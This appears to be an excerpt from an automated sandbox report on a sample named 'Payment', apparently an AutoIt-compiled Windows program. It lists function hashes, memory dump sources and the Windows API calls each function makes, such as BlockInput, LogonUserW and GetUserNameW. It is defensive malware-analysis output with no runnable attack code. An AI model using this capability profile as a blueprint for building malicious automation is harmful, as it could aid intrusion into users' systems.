                                                          • Instruction ID: 36dceea8538f1f14773d2921fc3a98f8b2d7866948205d21b2c5f66e30df234f
                                                          • Opcode Fuzzy Hash: cdc1e24a3fc52ccae3d5e7f64f327079c6c2b4dc6e6ec15e52e03e72e2c30be9
                                                          • Instruction Fuzzy Hash: 10321322D69F054DD7239635D832336A249AFB73D8F15D737F819B6AA6EF68C4834100
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e9a90f477e7b9597e87e85913f3c75aceb1e8ce7a6033c8d9809e0b649610de
                                                          • Instruction ID: b040aab04ea0d81b23fb13d7025a0c7d7cb6df03c496c8722a7e39dd9c7f3d86
                                                          • Opcode Fuzzy Hash: 1e9a90f477e7b9597e87e85913f3c75aceb1e8ce7a6033c8d9809e0b649610de
                                                          • Instruction Fuzzy Hash: 33B11120D2AF404DD72396398835332BA9CAFBB2C5F51D71BFC2671EA2EF6685834541
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __time64.LIBCMT ref: 00B38B25
                                                            • Part of subcall function 00AF543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B391F8,00000000,?,?,?,?,00B393A9,00000000,?), ref: 00AF5443
                                                            • Part of subcall function 00AF543A: __aulldiv.LIBCMT ref: 00AF5463
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                          • String ID:
                                                          • API String ID: 2893107130-0
                                                          • Opcode ID: 0b9ef93d95c5fa8e7a9da0ee3ab09986b6d441d83c4b1735a02189a26fb03a20
                                                          • Instruction ID: 69714f8c2ef148aec543c91cb3bbd89d7593fb9d655970675a9b73d1dfdd104c
                                                          • Opcode Fuzzy Hash: 0b9ef93d95c5fa8e7a9da0ee3ab09986b6d441d83c4b1735a02189a26fb03a20
                                                          • Instruction Fuzzy Hash: FA21D272635610CBC729CF25D441A52B3E1EBA4311F288E6DE1E5CB2D0CE75B905CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 00B44218
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 49665a35c2a0d8bacd4dbe1e731a0d5b158b0c4e652bb9fa4a0f78261549744c
                                                          • Instruction ID: 7834c241c434ef8d10287fd3edf7bc69cabbcca8dcb254decf4c104e7176b2de
                                                          • Opcode Fuzzy Hash: 49665a35c2a0d8bacd4dbe1e731a0d5b158b0c4e652bb9fa4a0f78261549744c
                                                          • Instruction Fuzzy Hash: 90E012312502145FD710AF59D444B5AF7E8AF55761F008056F84AC7351DBB0E9419B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B34F18
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: 2bc2f758d30223299eef1871b1031f855dfec514598b5f0145d21f07d3505b1d
                                                          • Instruction ID: e47132305648a37a9411ade434206af1ebaf9714607195a333c6a68011758d83
                                                          • Opcode Fuzzy Hash: 2bc2f758d30223299eef1871b1031f855dfec514598b5f0145d21f07d3505b1d
                                                          • Instruction Fuzzy Hash: 84D05EB016420539FC184B20AC0FF773188E341782FBC49C93209854C1AAF17800E034
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B288D1), ref: 00B28CB3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: 47bd14ad2e6c11d47a36f2d09e0e748cdc693bb44edccf9529d6fe79c2e38aa4
                                                          • Instruction ID: e542727ffa95d5bb8c59a8e50833fbcb02ab0db163abbe09461439257efb784e
                                                          • Opcode Fuzzy Hash: 47bd14ad2e6c11d47a36f2d09e0e748cdc693bb44edccf9529d6fe79c2e38aa4
                                                          • Instruction Fuzzy Hash: 0CD05E3226060EABEF018EA4DC01EBE3B69EB04B01F448111FE15C60A1C775D835AB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00B12242
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: d10b6b73e7c326b55d1e081de11d4104f0a8b3585b85b407d8f0a7dd1224e103
                                                          • Instruction ID: 256adbdc5195906bb5962f95de8b4df33489dca79bde25c4f7ad42beff16a83a
                                                          • Opcode Fuzzy Hash: d10b6b73e7c326b55d1e081de11d4104f0a8b3585b85b407d8f0a7dd1224e103
                                                          • Instruction Fuzzy Hash: 20C04CF1805109DBDB05DF90D988DFFB7BCAB04315F144495A101F2140D7749B448A71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AFA36A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 6e72838d77b091db182025cca1fdcdb562b75b257874f48c741b0ffd44af7a57
                                                          • Instruction ID: 63d64a6c1f3e00515d1a3cf2b4382b34fd5f6107859b0cfd8071ecf8b7381a5a
                                                          • Opcode Fuzzy Hash: 6e72838d77b091db182025cca1fdcdb562b75b257874f48c741b0ffd44af7a57
                                                          • Instruction Fuzzy Hash: 25A0123000020DA78A002F41EC04454BF5CD6001917004060F40C410318B3254104984
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88337bc90626c6b505ba7d60de673178f34c69301b0224c082bb7f697b406af3
                                                          • Instruction ID: e3bb108a1d16370bb85a93d37afe89567641a65d8774c59e1a0aa3e52898be19
                                                          • Opcode Fuzzy Hash: 88337bc90626c6b505ba7d60de673178f34c69301b0224c082bb7f697b406af3
                                                          • Instruction Fuzzy Hash: 0E2206305056A6CBCB388B16D4D467D77F1EB82344F3584AAD85E9B291DB3CDD81CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction ID: 7fb4a519a38d913abde8fba8ab628a4e46668398059d69ba491be6d8ea3c3545
                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction Fuzzy Hash: D1C183322050974ADF6D47BA943423EBAE15AA27B131A075EF5F3CB5C4EF20D625D720
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction ID: 9f3642387919acac3b20bdc0e078ab72bc7dfda27d06daa78a5eba3967b00515
                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction Fuzzy Hash: 57C1A33220519749DB2D47BA847413EBBE15BA27B131A076EF9F2DB4C4EF20D625E720
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction ID: 71f525b7c9a87275c32b2f32f4ffd5ff54b9c9c4a11e58a7230558c7de6e92ae
                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction Fuzzy Hash: 0CC1823221519789DF2D47BAD43403EBAE15AA27B131A076EF5F2CB5C4EF20D625D720
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00B47B70
                                                          • DeleteObject.GDI32(00000000), ref: 00B47B82
                                                          • DestroyWindow.USER32 ref: 00B47B90
                                                          • GetDesktopWindow.USER32 ref: 00B47BAA
                                                          • GetWindowRect.USER32(00000000), ref: 00B47BB1
                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B47CF2
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B47D02
                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47D4A
                                                          • GetClientRect.USER32(00000000,?), ref: 00B47D56
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B47D90
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47DB2
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47DC5
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47DD0
                                                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47DD9
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47DE8
                                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47DF1
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47DF8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00B47E03
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47E15
                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B62CAC,00000000), ref: 00B47E2B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00B47E3B
                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B47E61
                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B47E80
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B47EA2
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B4808F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2211948467-2373415609
                                                          • Opcode ID: a146593823f70b0905fb15d81c3a4670cbd3f8dc3a80bdb916d9cec19b9da3ea
                                                          • Instruction ID: 972d02bced61c1d58e245fe878ecc9ffc8fbee0511aa8e24387a4be6d855c254
                                                          • Opcode Fuzzy Hash: a146593823f70b0905fb15d81c3a4670cbd3f8dc3a80bdb916d9cec19b9da3ea
                                                          • Instruction Fuzzy Hash: 7C025D71900215EFDB14DFA4DD89EAEBBB9EF48311F148199F915AB2A1CB70DD01CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,00B5F910), ref: 00B538AF
                                                          • IsWindowVisible.USER32(?), ref: 00B538D3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: 3086ecaec0fa8f2c1aef4453fda39a2ae55879b77b6c523e900fad62d894933d
                                                          • Instruction ID: b2891ff2b559af1ec02f206dc27aa9e7d56bdb140d794962752bb41d63f862f5
                                                          • Opcode Fuzzy Hash: 3086ecaec0fa8f2c1aef4453fda39a2ae55879b77b6c523e900fad62d894933d
                                                          • Instruction Fuzzy Hash: 0FD149312043199BCB24EF60C591F6AB7E1EF95785F1444D9BC865B3A3CB21EA0ACB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 00B5A89F
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00B5A8D0
                                                          • GetSysColor.USER32(0000000F), ref: 00B5A8DC
                                                          • SetBkColor.GDI32(?,000000FF), ref: 00B5A8F6
                                                          • SelectObject.GDI32(?,?), ref: 00B5A905
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B5A930
                                                          • GetSysColor.USER32(00000010), ref: 00B5A938
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00B5A93F
                                                          • FrameRect.USER32(?,?,00000000), ref: 00B5A94E
                                                          • DeleteObject.GDI32(00000000), ref: 00B5A955
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00B5A9A0
                                                          • FillRect.USER32(?,?,?), ref: 00B5A9D2
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B5A9FD
                                                            • Part of subcall function 00B5AB60: GetSysColor.USER32(00000012), ref: 00B5AB99
                                                            • Part of subcall function 00B5AB60: SetTextColor.GDI32(?,?), ref: 00B5AB9D
                                                            • Part of subcall function 00B5AB60: GetSysColorBrush.USER32(0000000F), ref: 00B5ABB3
                                                            • Part of subcall function 00B5AB60: GetSysColor.USER32(0000000F), ref: 00B5ABBE
                                                            • Part of subcall function 00B5AB60: GetSysColor.USER32(00000011), ref: 00B5ABDB
                                                            • Part of subcall function 00B5AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B5ABE9
                                                            • Part of subcall function 00B5AB60: SelectObject.GDI32(?,00000000), ref: 00B5ABFA
                                                            • Part of subcall function 00B5AB60: SetBkColor.GDI32(?,00000000), ref: 00B5AC03
                                                            • Part of subcall function 00B5AB60: SelectObject.GDI32(?,?), ref: 00B5AC10
                                                            • Part of subcall function 00B5AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00B5AC2F
                                                            • Part of subcall function 00B5AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B5AC46
                                                            • Part of subcall function 00B5AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00B5AC5B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                          • String ID:
                                                          • API String ID: 4124339563-0
                                                          • Opcode ID: ba435e4c12ea5face96d891d3fcb4ecbf2aaf23e12ae807fd15f4a9bb6f85e52
                                                          • Instruction ID: 4807f29f2501b10035a09fdd2139bbfbedab8f91e4759f865484b3fbf09e7981
                                                          • Opcode Fuzzy Hash: ba435e4c12ea5face96d891d3fcb4ecbf2aaf23e12ae807fd15f4a9bb6f85e52
                                                          • Instruction Fuzzy Hash: 88A17071408302AFD7109F64DC48B6BBBE9FB88322F144BA9F952A71E0DB30D845CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 00AD2CA2
                                                          • DeleteObject.GDI32(00000000), ref: 00AD2CE8
                                                          • DeleteObject.GDI32(00000000), ref: 00AD2CF3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00AD2CFE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00AD2D09
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B0C68B
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B0C6C4
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B0CAED
                                                            • Part of subcall function 00AD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AD2036,?,00000000,?,?,?,?,00AD16CB,00000000,?), ref: 00AD1B9A
                                                          • SendMessageW.USER32(?,00001053), ref: 00B0CB2A
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B0CB41
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B0CB57
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B0CB62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
